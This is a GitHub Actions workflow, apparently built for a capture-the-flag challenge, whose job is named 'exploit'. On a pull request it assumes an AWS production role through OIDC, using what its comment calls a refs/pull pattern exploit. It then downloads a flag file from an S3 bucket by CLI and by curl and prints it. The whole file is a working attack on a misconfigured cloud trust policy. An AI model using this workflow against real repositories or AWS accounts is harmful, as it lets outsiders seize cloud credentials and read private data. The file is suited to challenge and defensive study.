name: Malicious Pipeline Scan
on:
  pull_request:  # Required for refs/pull* pattern exploit
    branches: 
      - main

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    
    steps:
    - name: Checkout
      uses: actions/checkout@v4
      
    - name: Exploit AWS Role
      uses: aws-actions/configure-aws-credentials@v4
      with:
        aws-region: us-east-1
        role-to-assume: arn:aws:iam::${{ secrets.AWS_ACCOUNT_ID }}:role/warden-production
        
    - name: Get Easter Egg Flag
      run: |
        # Direct download of the target file
        aws s3 cp s3://warden-easter-egg-c4bak76z/easter_egg.txt ./flag.txt
        
        # Show the flag
        echo "🥚 EASTER EGG FOUND:"
        echo "=================="
        cat ./flag.txt
        echo "=================="
        
        # Also try HTTP as backup
        echo "🌐 HTTP Backup:"
        curl -s http://warden-easter-egg-c4bak76z.s3.amazonaws.com/easter_egg.txt
